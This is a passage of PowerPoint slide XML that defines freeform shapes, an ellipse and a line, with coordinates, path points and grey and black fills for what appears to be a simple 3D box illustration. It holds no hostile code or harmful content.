          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="zh-CN" altLang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="122912" name="Freeform 1054">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{14BFE782-F665-46E3-B529-813C487922B7}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3079" y="2614"/>
              <a:ext cx="319" cy="54"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 0 w 637"/>
                <a:gd name="T1" fmla="*/ 1 h 108"/>
                <a:gd name="T2" fmla="*/ 1 w 637"/>
                <a:gd name="T3" fmla="*/ 0 h 108"/>
                <a:gd name="T4" fmla="*/ 1 w 637"/>
                <a:gd name="T5" fmla="*/ 1 h 108"/>
                <a:gd name="T6" fmla="*/ 1 w 637"/>
                <a:gd name="T7" fmla="*/ 1 h 108"/>
                <a:gd name="T8" fmla="*/ 0 w 637"/>
                <a:gd name="T9" fmla="*/ 1 h 108"/>
                <a:gd name="T10" fmla="*/ 0 60000 65536"/>
                <a:gd name="T11" fmla="*/ 0 60000 65536"/>
                <a:gd name="T12" fmla="*/ 0 60000 65536"/>
                <a:gd name="T13" fmla="*/ 0 60000 65536"/>
                <a:gd name="T14" fmla="*/ 0 60000 65536"/>
                <a:gd name="T15" fmla="*/ 0 w 637"/>
                <a:gd name="T16" fmla="*/ 0 h 108"/>
                <a:gd name="T17" fmla="*/ 637 w 637"/>
                <a:gd name="T18" fmla="*/ 108 h 108"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="T10">
                  <a:pos x="T0" y="T1"/>
                </a:cxn>
                <a:cxn ang="T11">
                  <a:pos x="T2" y="T3"/>
                </a:cxn>
                <a:cxn ang="T12">
                  <a:pos x="T4" y="T5"/>
                </a:cxn>
                <a:cxn ang="T13">
                  <a:pos x="T6" y="T7"/>
                </a:cxn>
                <a:cxn ang="T14">
                  <a:pos x="T8" y="T9"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="T15" t="T16" r="T17" b="T18"/>
              <a:pathLst>
                <a:path w="637" h="108">
                  <a:moveTo>
                    <a:pt x="0" y="49"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="56" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="637" y="61"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="572" y="108"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="49"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:ln w="11113">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="zh-CN" altLang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="122913" name="Freeform 1055">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{306DFA5F-9C23-49E1-98C2-6DF9AD5A2001}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3385" y="2617"/>
              <a:ext cx="44" cy="208"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 0 w 90"/>
                <a:gd name="T1" fmla="*/ 0 h 416"/>
                <a:gd name="T2" fmla="*/ 0 w 90"/>
                <a:gd name="T3" fmla="*/ 1 h 416"/>
                <a:gd name="T4" fmla="*/ 0 w 90"/>
                <a:gd name="T5" fmla="*/ 1 h 416"/>
                <a:gd name="T6" fmla="*/ 0 w 90"/>
                <a:gd name="T7" fmla="*/ 1 h 416"/>
                <a:gd name="T8" fmla="*/ 0 w 90"/>
                <a:gd name="T9" fmla="*/ 0 h 416"/>
                <a:gd name="T10" fmla="*/ 0 60000 65536"/>
                <a:gd name="T11" fmla="*/ 0 60000 65536"/>
                <a:gd name="T12" fmla="*/ 0 60000 65536"/>
                <a:gd name="T13" fmla="*/ 0 60000 65536"/>
                <a:gd name="T14" fmla="*/ 0 60000 65536"/>
                <a:gd name="T15" fmla="*/ 0 w 90"/>
                <a:gd name="T16" fmla="*/ 0 h 416"/>
                <a:gd name="T17" fmla="*/ 90 w 90"/>
                <a:gd name="T18" fmla="*/ 416 h 416"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="T10">
                  <a:pos x="T0" y="T1"/>
                </a:cxn>
                <a:cxn ang="T11">
                  <a:pos x="T2" y="T3"/>
                </a:cxn>
                <a:cxn ang="T12">
                  <a:pos x="T4" y="T5"/>
                </a:cxn>
                <a:cxn ang="T13">
                  <a:pos x="T6" y="T7"/>
                </a:cxn>
                <a:cxn ang="T14">
                  <a:pos x="T8" y="T9"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="T15" t="T16" r="T17" b="T18"/>
              <a:pathLst>
                <a:path w="90" h="416">
                  <a:moveTo>
                    <a:pt x="90" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="90" y="274"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6" y="416"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="80"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="90" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:ln w="11113">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="zh-CN" altLang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="122914" name="Freeform 1056">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4C124BEB-4129-4C56-AEFD-C572D2078207}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3366" y="2623"/>
              <a:ext cx="41" cy="230"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 0 w 83"/>
                <a:gd name="T1" fmla="*/ 0 h 460"/>
                <a:gd name="T2" fmla="*/ 0 w 83"/>
                <a:gd name="T3" fmla="*/ 1 h 460"/>
                <a:gd name="T4" fmla="*/ 0 w 83"/>
                <a:gd name="T5" fmla="*/ 1 h 460"/>
                <a:gd name="T6" fmla="*/ 0 w 83"/>
                <a:gd name="T7" fmla="*/ 1 h 460"/>
                <a:gd name="T8" fmla="*/ 0 w 83"/>
                <a:gd name="T9" fmla="*/ 0 h 460"/>
                <a:gd name="T10" fmla="*/ 0 60000 65536"/>
                <a:gd name="T11" fmla="*/ 0 60000 65536"/>
                <a:gd name="T12" fmla="*/ 0 60000 65536"/>
                <a:gd name="T13" fmla="*/ 0 60000 65536"/>
                <a:gd name="T14" fmla="*/ 0 60000 65536"/>
                <a:gd name="T15" fmla="*/ 0 w 83"/>
                <a:gd name="T16" fmla="*/ 0 h 460"/>
                <a:gd name="T17" fmla="*/ 83 w 83"/>
                <a:gd name="T18" fmla="*/ 460 h 460"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="T10">
                  <a:pos x="T0" y="T1"/>
                </a:cxn>
                <a:cxn ang="T11">
                  <a:pos x="T2" y="T3"/>
                </a:cxn>
                <a:cxn ang="T12">
                  <a:pos x="T4" y="T5"/>
                </a:cxn>
                <a:cxn ang="T13">
                  <a:pos x="T6" y="T7"/>
                </a:cxn>
                <a:cxn ang="T14">
                  <a:pos x="T8" y="T9"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="T15" t="T16" r="T17" b="T18"/>
              <a:pathLst>
                <a:path w="83" h="460">
                  <a:moveTo>
                    <a:pt x="83" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="65" y="404"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="460"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="90"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="83" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:ln w="11113">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="zh-CN" altLang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="122915" name="Freeform 1057">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B2EA8C9F-A836-4243-99E8-4A952066ACCD}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3120" y="2590"/>
              <a:ext cx="306" cy="62"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 0 w 613"/>
                <a:gd name="T1" fmla="*/ 1 h 124"/>
                <a:gd name="T2" fmla="*/ 0 w 613"/>
                <a:gd name="T3" fmla="*/ 0 h 124"/>
                <a:gd name="T4" fmla="*/ 0 w 613"/>
                <a:gd name="T5" fmla="*/ 1 h 124"/>
                <a:gd name="T6" fmla="*/ 0 w 613"/>
                <a:gd name="T7" fmla="*/ 1 h 124"/>
                <a:gd name="T8" fmla="*/ 0 w 613"/>
                <a:gd name="T9" fmla="*/ 1 h 124"/>
                <a:gd name="T10" fmla="*/ 0 60000 65536"/>
                <a:gd name="T11" fmla="*/ 0 60000 65536"/>
                <a:gd name="T12" fmla="*/ 0 60000 65536"/>
                <a:gd name="T13" fmla="*/ 0 60000 65536"/>
                <a:gd name="T14" fmla="*/ 0 60000 65536"/>
                <a:gd name="T15" fmla="*/ 0 w 613"/>
                <a:gd name="T16" fmla="*/ 0 h 124"/>
                <a:gd name="T17" fmla="*/ 613 w 613"/>
                <a:gd name="T18" fmla="*/ 124 h 124"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="T10">
                  <a:pos x="T0" y="T1"/>
                </a:cxn>
                <a:cxn ang="T11">
                  <a:pos x="T2" y="T3"/>
                </a:cxn>
                <a:cxn ang="T12">
                  <a:pos x="T4" y="T5"/>
                </a:cxn>
                <a:cxn ang="T13">
                  <a:pos x="T6" y="T7"/>
                </a:cxn>
                <a:cxn ang="T14">
                  <a:pos x="T8" y="T9"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="T15" t="T16" r="T17" b="T18"/>
              <a:pathLst>
                <a:path w="613" h="124">
                  <a:moveTo>
                    <a:pt x="0" y="40"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="123" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="613" y="50"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="525" y="124"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="40"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="EFEFEF"/>
            </a:solidFill>
            <a:ln w="11113">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="zh-CN" altLang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="122916" name="Freeform 1058">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{97583802-3BFD-42A7-9A8E-305016EFDD31}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3381" y="2741"/>
              <a:ext cx="180" cy="217"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 0 w 359"/>
                <a:gd name="T1" fmla="*/ 0 h 435"/>
                <a:gd name="T2" fmla="*/ 0 w 359"/>
                <a:gd name="T3" fmla="*/ 0 h 435"/>
                <a:gd name="T4" fmla="*/ 1 w 359"/>
                <a:gd name="T5" fmla="*/ 0 h 435"/>
                <a:gd name="T6" fmla="*/ 1 w 359"/>
                <a:gd name="T7" fmla="*/ 0 h 435"/>
                <a:gd name="T8" fmla="*/ 1 w 359"/>
                <a:gd name="T9" fmla="*/ 0 h 435"/>
                <a:gd name="T10" fmla="*/ 0 w 359"/>
                <a:gd name="T11" fmla="*/ 0 h 435"/>
                <a:gd name="T12" fmla="*/ 0 60000 65536"/>
                <a:gd name="T13" fmla="*/ 0 60000 65536"/>
                <a:gd name="T14" fmla="*/ 0 60000 65536"/>
                <a:gd name="T15" fmla="*/ 0 60000 65536"/>
                <a:gd name="T16" fmla="*/ 0 60000 65536"/>
                <a:gd name="T17" fmla="*/ 0 60000 65536"/>
                <a:gd name="T18" fmla="*/ 0 w 359"/>
                <a:gd name="T19" fmla="*/ 0 h 435"/>
                <a:gd name="T20" fmla="*/ 359 w 359"/>
                <a:gd name="T21" fmla="*/ 435 h 435"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="T12">
                  <a:pos x="T0" y="T1"/>
                </a:cxn>
                <a:cxn ang="T13">
                  <a:pos x="T2" y="T3"/>
                </a:cxn>
                <a:cxn ang="T14">
                  <a:pos x="T4" y="T5"/>
                </a:cxn>
                <a:cxn ang="T15">
                  <a:pos x="T6" y="T7"/>
                </a:cxn>
                <a:cxn ang="T16">
                  <a:pos x="T8" y="T9"/>
                </a:cxn>
                <a:cxn ang="T17">
                  <a:pos x="T10" y="T11"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="T18" t="T19" r="T20" b="T21"/>
              <a:pathLst>
                <a:path w="359" h="435">
                  <a:moveTo>
                    <a:pt x="0" y="294"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="435"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="359" y="138"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="359" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="164" y="56"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="294"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="8F8F8F"/>
            </a:solidFill>
            <a:ln w="11113">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="zh-CN" altLang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="122917" name="Freeform 1059">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{46C4CBDF-F0E4-41A3-B24E-CF39558DC330}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2990" y="2845"/>
              <a:ext cx="391" cy="113"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 0 w 783"/>
                <a:gd name="T1" fmla="*/ 1 h 226"/>
                <a:gd name="T2" fmla="*/ 0 w 783"/>
                <a:gd name="T3" fmla="*/ 1 h 226"/>
                <a:gd name="T4" fmla="*/ 0 w 783"/>
                <a:gd name="T5" fmla="*/ 1 h 226"/>
                <a:gd name="T6" fmla="*/ 0 w 783"/>
                <a:gd name="T7" fmla="*/ 1 h 226"/>
                <a:gd name="T8" fmla="*/ 0 w 783"/>
                <a:gd name="T9" fmla="*/ 0 h 226"/>
                <a:gd name="T10" fmla="*/ 0 w 783"/>
                <a:gd name="T11" fmla="*/ 1 h 226"/>
                <a:gd name="T12" fmla="*/ 0 60000 65536"/>
                <a:gd name="T13" fmla="*/ 0 60000 65536"/>
                <a:gd name="T14" fmla="*/ 0 60000 65536"/>
                <a:gd name="T15" fmla="*/ 0 60000 65536"/>
                <a:gd name="T16" fmla="*/ 0 60000 65536"/>
                <a:gd name="T17" fmla="*/ 0 60000 65536"/>
                <a:gd name="T18" fmla="*/ 0 w 783"/>
                <a:gd name="T19" fmla="*/ 0 h 226"/>
                <a:gd name="T20" fmla="*/ 783 w 783"/>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783" h="226">
                  <a:moveTo>
                    <a:pt x="0" y="9"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="144"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="783" y="226"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="783" y="72"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="73" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="9"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="D2D2D2"/>
            </a:solidFill>
            <a:ln w="11113">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="zh-CN" altLang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="122918" name="Freeform 1060">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B26CCA84-046B-4F13-95E4-CD36BD7B3BF9}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2990" y="2702"/>
              <a:ext cx="571" cy="187"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 0 w 1142"/>
                <a:gd name="T1" fmla="*/ 1 h 374"/>
                <a:gd name="T2" fmla="*/ 1 w 1142"/>
                <a:gd name="T3" fmla="*/ 0 h 374"/>
                <a:gd name="T4" fmla="*/ 1 w 1142"/>
                <a:gd name="T5" fmla="*/ 1 h 374"/>
                <a:gd name="T6" fmla="*/ 1 w 1142"/>
                <a:gd name="T7" fmla="*/ 1 h 374"/>
                <a:gd name="T8" fmla="*/ 0 w 1142"/>
                <a:gd name="T9" fmla="*/ 1 h 374"/>
                <a:gd name="T10" fmla="*/ 0 60000 65536"/>
                <a:gd name="T11" fmla="*/ 0 60000 65536"/>
                <a:gd name="T12" fmla="*/ 0 60000 65536"/>
                <a:gd name="T13" fmla="*/ 0 60000 65536"/>
                <a:gd name="T14" fmla="*/ 0 60000 65536"/>
                <a:gd name="T15" fmla="*/ 0 w 1142"/>
                <a:gd name="T16" fmla="*/ 0 h 374"/>
                <a:gd name="T17" fmla="*/ 1142 w 1142"/>
                <a:gd name="T18" fmla="*/ 374 h 374"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="T10">
                  <a:pos x="T0" y="T1"/>
                </a:cxn>
                <a:cxn ang="T11">
                  <a:pos x="T2" y="T3"/>
                </a:cxn>
                <a:cxn ang="T12">
                  <a:pos x="T4" y="T5"/>
                </a:cxn>
                <a:cxn ang="T13">
                  <a:pos x="T6" y="T7"/>
                </a:cxn>
                <a:cxn ang="T14">
                  <a:pos x="T8" y="T9"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="T15" t="T16" r="T17" b="T18"/>
              <a:pathLst>
                <a:path w="1142" h="374">
                  <a:moveTo>
                    <a:pt x="0" y="297"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="358" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1142" y="77"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="783" y="374"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="297"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="EFEFEF"/>
            </a:solidFill>
            <a:ln w="11113">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="zh-CN" altLang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="122919" name="Oval 1061">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3BCBE492-1B28-4F51-91BC-BECD6DCAED14}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3123" y="2744"/>
              <a:ext cx="262" cy="102"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="8F8F8F"/>
            </a:solidFill>
            <a:ln w="11113">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920" name="Line 1062">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BA992A8D-CA55-4B2B-8E4F-FD14592C654A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipV="1">
              <a:off x="3074" y="2609"/>
              <a:ext cx="30" cy="24"/>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21" name="Freeform 1063">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C43C5B09-464A-46D8-A809-BC4ACADDD8C8}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3074" y="2633"/>
              <a:ext cx="286" cy="217"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 0 w 571"/>
                <a:gd name="T1" fmla="*/ 0 h 434"/>
                <a:gd name="T2" fmla="*/ 0 w 571"/>
                <a:gd name="T3" fmla="*/ 1 h 434"/>
                <a:gd name="T4" fmla="*/ 1 w 571"/>
                <a:gd name="T5" fmla="*/ 1 h 434"/>
                <a:gd name="T6" fmla="*/ 1 w 571"/>
                <a:gd name="T7" fmla="*/ 1 h 434"/>
                <a:gd name="T8" fmla="*/ 0 w 571"/>
                <a:gd name="T9" fmla="*/ 0 h 434"/>
                <a:gd name="T10" fmla="*/ 0 60000 65536"/>
                <a:gd name="T11" fmla="*/ 0 60000 65536"/>
                <a:gd name="T12" fmla="*/ 0 60000 65536"/>
                <a:gd name="T13" fmla="*/ 0 60000 65536"/>
                <a:gd name="T14" fmla="*/ 0 60000 65536"/>
                <a:gd name="T15" fmla="*/ 0 w 571"/>
                <a:gd name="T16" fmla="*/ 0 h 434"/>
                <a:gd name="T17" fmla="*/ 571 w 571"/>
                <a:gd name="T18" fmla="*/ 434 h 434"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="T10">
                  <a:pos x="T0" y="T1"/>
                </a:cxn>
                <a:cxn ang="T11">
                  <a:pos x="T2" y="T3"/>
                </a:cxn>
                <a:cxn ang="T12">
                  <a:pos x="T4" y="T5"/>
                </a:cxn>
                <a:cxn ang="T13">
                  <a:pos x="T6" y="T7"/>
                </a:cxn>
                <a:cxn ang="T14">
                  <a:pos x="T8" y="T9"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="T15" t="T16" r="T17" b="T18"/>
              <a:pathLst>
                <a:path w="571" h="434">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="376"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="571" y="434"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="571" y="60"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="D2D2D2"/>
            </a:solidFill>
            <a:ln w="11113">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="zh-CN" altLang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="122922" name="Freeform 1064">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C59F388D-4EDE-4E26-AE94-CBA22BD43A79}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3074" y="2609"/>
              <a:ext cx="318" cy="54"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 0 w 636"/>
                <a:gd name="T1" fmla="*/ 1 h 108"/>
                <a:gd name="T2" fmla="*/ 1 w 636"/>
                <a:gd name="T3" fmla="*/ 0 h 108"/>
                <a:gd name="T4" fmla="*/ 1 w 636"/>
                <a:gd name="T5" fmla="*/ 1 h 108"/>
                <a:gd name="T6" fmla="*/ 1 w 636"/>
                <a:gd name="T7" fmla="*/ 1 h 108"/>
                <a:gd name="T8" fmla="*/ 0 w 636"/>
                <a:gd name="T9" fmla="*/ 1 h 108"/>
                <a:gd name="T10" fmla="*/ 0 60000 65536"/>
                <a:gd name="T11" fmla="*/ 0 60000 65536"/>
                <a:gd name="T12" fmla="*/ 0 60000 65536"/>
